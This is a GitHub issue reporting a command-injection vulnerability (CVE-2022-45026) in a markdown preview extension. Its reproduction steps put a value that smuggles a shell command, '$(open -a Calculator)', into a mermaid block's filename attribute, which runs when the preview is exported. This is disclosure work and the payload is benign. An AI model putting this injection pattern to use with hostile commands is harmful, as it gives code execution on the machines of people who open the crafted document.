New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Vulnerability] Code execution via GitHub Flavored Markdown export #774

Open

yuriisanin opened this issue Nov 22, 2022 · 1 comment

yuriisanin commented Nov 22, 2022 •

edited

Loading

Video PoC for Atom on YouTube:

Original issue: shd101wyy/mume, OS command injection via Memraid PNG export

STR (please, note that the following PoC works for OS X it might be different for Linux or Windows):

Create document with the following code inside.

mermaid {filename="$(open -a Calculator)hello.pdf"}
gitGraph
       commit id: "Normal"
       commit
       commit id: "Reverse" type: REVERSE
       commit
       commit id: "Highlight" type: HIGHLIGHT
       commit

Open preview
Use "Save as Markdown" button in the preview window
Calculator program should appear on the screen.

The text was updated successfully, but these errors were encountered:

Author

yuriisanin commented Dec 7, 2022

Assigned CVE-2022-45026

shd101wyy transferred this issue from shd101wyy/markdown-preview-enhanced

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment